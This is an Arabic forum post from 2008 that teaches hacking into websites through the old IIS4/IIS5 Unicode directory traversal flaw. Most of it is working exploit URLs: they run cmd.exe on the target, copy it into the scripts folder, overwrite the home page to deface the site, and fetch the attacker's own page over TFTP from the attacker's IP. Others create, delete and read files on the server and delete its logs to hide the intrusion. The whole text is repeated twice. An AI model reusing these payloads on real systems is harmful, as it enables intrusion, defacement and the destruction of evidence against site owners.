جميع طرق اختراق المواقع مهم جدا جدا جدا Vip حصري جزء4
صفحة 1 من اصل 1
جميع طرق اختراق المواقع مهم جدا جدا جدا Vip حصري جزء4
من طرف ملك الرومانسيه السبت مارس 08, 2008 10:13 am
------------------------------
ملحوظه :
--------
قد نحتاج الى تغيير مسمى الدليل بحيث يكون
msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
و الان لتغيير الصفحه الاولى لموقع لابد من :
الكتابه على الصفحه الرئيسيه مستخدمين الامر
echo
برفع صفحتك الشخصيه بواسطة برنامج ال
TFTP
طريقة الكتابه على الملف الرئيسي للموقع
index.htm
باستخدام الامر
echo
------------------------
مبدئيا لابد من نسخ ملف
cmd.exe
الي مجلد
scripts
بهذا الشكل على سبيل المثال :
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe
-----------------------------------------------------------------------------------
و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده
http://www.xxx.com/scripts/DJ.exe/c+dir+c:
و بعدها يمكن تنفيذ الامر
echo
بالشكل التالي
http://www.xxx.com/scripts/DJ.exe?/...hackermail.com+>+c:inetpubwwwrootindex.htm
-----------------------------------------------------------------------------------
ملحوظات هامه:
--------------
ليس بالضروره ان يكون الاندكس الرئسيه للموقع اسمها
index.htm
فممكن ان تكون
index.html , default.html , default.htm , default.asp
فعليك التاكد اولا من اسم الملف و لكن
index.htm
هو الافتراضي ان يكون الرئيسي
- ممكن ان يكون الملف الرئيسي في مجلد غير ال
wwwroot
لذا فلابد من البحث ...
-----------------------------------------------------------------------------------
طريقة استخدام رفع الصفحه بواسطة برنامج
TFTP
سيتم تبطيقها ايضا بالثغره التي اقترضتها اعلى
حمل برنامج ال
tftp
فهو صغير و مجاني
ضعه في ال
c:
ضع الاندكس او صفحتك المراد رفعها في ايضا ال
c:
شغل البرنامج و اجعله جاهزا ثم نفذ الامر التالي:
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex. htm
-----------------------------------------------------------------------------------
حيث
-------
tftp.exe هو البرنامج المستخدم للرفع
"i-" براميتر
y.y.y.y رقم الايبي الخاص بك
و الباقي على ما اظن لا يحتاج توضيح ..
C:inetpubwwwrootindex.htm
هو الوضع الافتراضي كما ذكرت لكن ممكن ان يختلف من موقع لاخر فلابد من التاكد اولا
-----------------------------------------------------------------------------------
و اخيرا لمسح اللوق
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log
-----------------------------------------------------------------------------------
هذا تقريبا كل ما يخص سيرفرات الويندوز و ال
IIS
اما بالنسبه للمواقع التي سيرفراتها على سبيل المثال : Apache on linux
فطريقة التفكيير ستتغير كليا ماعدا الاختراق عن طريق ال
ftp server
فمعظم نسخ ال
ftp
لها ثغرات يمكن استغلالها.
---------------------------------------------------------------------
5 - شرح ثغرة اليونيكود وكيفية استغلالها:
اولا ثغرات اليونيكود:
UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس
- تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع
IIS4.0 / IIS5.0
والذي ياتي عادة مع
NT4 / Win2k .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي
تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ
IIS4 / IIS5
يبدا ملف
CMD
بفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الاوامر المستخدمة بواسطة ملف
.CMD
الاوامر المستخدمه بواسطة ملف الـ
CMD
وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر
الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة
داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
**************************************************
**********
امر انشاء دليل جديد
http://www.xxxx.com/msadc/..%c0%af....xe?/c+md+c:\\hEx
**************************************************
**********
امر الغاء دليل
http://www.xxxx.com/msadc/..%c0%af....xe?/c+rd+c:\\hEx
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات.
**************************************************
**********
الامر المستخدم للنسخ
http://www.xxxx.com/msadc/..%c0%af....scripts\\hEx.exe
**************************************************
**********
الامر المستخدم للنقل
http://www.xxxx.com/msadc/..%c0%af....pts\\hEx.exe+c:\\
**************************************************
**********
الامر المستخدم للحذف
http://www.xxxx.com/msadc/..%c0%af....+del+c:\\hEx.mdb
**************************************************
**********
الامر المستخدم لتغيير مسمى الملفات http://www.xxxx.com/msadc/..%c0%af....dex.htm+hEx.htm
**************************************************
**********
الامر المستخدم لرؤية محتويات الملف
http://www.xxxx.com/msadc/..%c0%af....type+c:\\hEx.txt
**************************************************
**********
الامر المستخدم للكتابة داخل أي ملف
http://www.xxxx.com/msadc/..%c0%af....cho+sNiper_hEx+>c:\\hEx.txt
**************************************************
**********
الامر المستخدم لعملية سحب أي ملف
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي
http://www.xxxx.com/msadc/hEx.mdb
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
http://www.xxxx.com/scripts/..%c1%1....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c0%9....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c0%a....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c0%q....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c1%8....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c1%9....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c1%p.../cmd.exe?/c+dir +c:\\
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-
http://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:\\
فنحتاج الى نسخ ملف
w3svc.exe
الى مجلد
inetpub\\scripts
والامر يكون بهذه الطريقة:
http://www.xxxx.com/msadc/..%c0%af....ripts\\w3svc.exe
بعد نسخ ملف
w3svc.exe
الى مجلد
inetpub\\scripts
الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\\
الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\\wwwroot\\index.htm
بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/scripts/w3svc.e...ay@Hotmail.com+>+c:\\inetpub\\wwwroot\\inde x.htm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
طيقة نسخ ملف ال
CMD
نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af....cripts\\cmd1.exe
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الان بامكاننا استخدام ملف الـ
CMD
الجديد في الثغرة بدلا من الاول بهذا الشكل
http://www.xxxx.com/msadc/..%c0%af....1.exe?c+dir+c:\\
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ملحوظه :
--------
قد نحتاج الى تغيير مسمى الدليل بحيث يكون
msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
و الان لتغيير الصفحه الاولى لموقع لابد من :
الكتابه على الصفحه الرئيسيه مستخدمين الامر
echo
برفع صفحتك الشخصيه بواسطة برنامج ال
TFTP
طريقة الكتابه على الملف الرئيسي للموقع
index.htm
باستخدام الامر
echo
------------------------
مبدئيا لابد من نسخ ملف
cmd.exe
الي مجلد
scripts
بهذا الشكل على سبيل المثال :
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe
-----------------------------------------------------------------------------------
و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده
http://www.xxx.com/scripts/DJ.exe/c+dir+c:
و بعدها يمكن تنفيذ الامر
echo
بالشكل التالي
http://www.xxx.com/scripts/DJ.exe?/...hackermail.com+>+c:inetpubwwwrootindex.htm
-----------------------------------------------------------------------------------
ملحوظات هامه:
--------------
ليس بالضروره ان يكون الاندكس الرئسيه للموقع اسمها
index.htm
فممكن ان تكون
index.html , default.html , default.htm , default.asp
فعليك التاكد اولا من اسم الملف و لكن
index.htm
هو الافتراضي ان يكون الرئيسي
- ممكن ان يكون الملف الرئيسي في مجلد غير ال
wwwroot
لذا فلابد من البحث ...
-----------------------------------------------------------------------------------
طريقة استخدام رفع الصفحه بواسطة برنامج
TFTP
سيتم تبطيقها ايضا بالثغره التي اقترضتها اعلى
حمل برنامج ال
tftp
فهو صغير و مجاني
ضعه في ال
c:
ضع الاندكس او صفحتك المراد رفعها في ايضا ال
c:
شغل البرنامج و اجعله جاهزا ثم نفذ الامر التالي:
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex. htm
-----------------------------------------------------------------------------------
حيث
-------
tftp.exe هو البرنامج المستخدم للرفع
"i-" براميتر
y.y.y.y رقم الايبي الخاص بك
و الباقي على ما اظن لا يحتاج توضيح ..
C:inetpubwwwrootindex.htm
هو الوضع الافتراضي كما ذكرت لكن ممكن ان يختلف من موقع لاخر فلابد من التاكد اولا
-----------------------------------------------------------------------------------
و اخيرا لمسح اللوق
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log
-----------------------------------------------------------------------------------
هذا تقريبا كل ما يخص سيرفرات الويندوز و ال
IIS
اما بالنسبه للمواقع التي سيرفراتها على سبيل المثال : Apache on linux
فطريقة التفكيير ستتغير كليا ماعدا الاختراق عن طريق ال
ftp server
فمعظم نسخ ال
ftp
لها ثغرات يمكن استغلالها.
---------------------------------------------------------------------
5 - شرح ثغرة اليونيكود وكيفية استغلالها:
اولا ثغرات اليونيكود:
UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس
- تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع
IIS4.0 / IIS5.0
والذي ياتي عادة مع
NT4 / Win2k .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي
تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ
IIS4 / IIS5
يبدا ملف
CMD
بفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الاوامر المستخدمة بواسطة ملف
.CMD
الاوامر المستخدمه بواسطة ملف الـ
CMD
وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر
الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة
داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
**************************************************
**********
امر انشاء دليل جديد
http://www.xxxx.com/msadc/..%c0%af....xe?/c+md+c:\\hEx
**************************************************
**********
امر الغاء دليل
http://www.xxxx.com/msadc/..%c0%af....xe?/c+rd+c:\\hEx
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات.
**************************************************
**********
الامر المستخدم للنسخ
http://www.xxxx.com/msadc/..%c0%af....scripts\\hEx.exe
**************************************************
**********
الامر المستخدم للنقل
http://www.xxxx.com/msadc/..%c0%af....pts\\hEx.exe+c:\\
**************************************************
**********
الامر المستخدم للحذف
http://www.xxxx.com/msadc/..%c0%af....+del+c:\\hEx.mdb
**************************************************
**********
الامر المستخدم لتغيير مسمى الملفات http://www.xxxx.com/msadc/..%c0%af....dex.htm+hEx.htm
**************************************************
**********
الامر المستخدم لرؤية محتويات الملف
http://www.xxxx.com/msadc/..%c0%af....type+c:\\hEx.txt
**************************************************
**********
الامر المستخدم للكتابة داخل أي ملف
http://www.xxxx.com/msadc/..%c0%af....cho+sNiper_hEx+>c:\\hEx.txt
**************************************************
**********
الامر المستخدم لعملية سحب أي ملف
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي
http://www.xxxx.com/msadc/hEx.mdb
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
http://www.xxxx.com/scripts/..%c1%1....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c0%9....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c0%a....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c0%q....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c1%8....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c1%9....exe?/c+dir+c:\\
http://www.xxxx.com/scripts/..%c1%p.../cmd.exe?/c+dir +c:\\
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-
http://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:\\
فنحتاج الى نسخ ملف
w3svc.exe
الى مجلد
inetpub\\scripts
والامر يكون بهذه الطريقة:
http://www.xxxx.com/msadc/..%c0%af....ripts\\w3svc.exe
بعد نسخ ملف
w3svc.exe
الى مجلد
inetpub\\scripts
الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\\
الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\\wwwroot\\index.htm
بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/scripts/w3svc.e...ay@Hotmail.com+>+c:\\inetpub\\wwwroot\\inde x.htm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
طيقة نسخ ملف ال
CMD
نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af....cripts\\cmd1.exe
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الان بامكاننا استخدام ملف الـ
CMD
الجديد في الثغرة بدلا من الاول بهذا الشكل
http://www.xxxx.com/msadc/..%c0%af....1.exe?c+dir+c:\\
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ملك الرومانسيه- مشرف مميز
- عدد الرسائل : 38
العمر : 36
تاريخ التسجيل : 24/02/2008
مواضيع مماثلةصفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى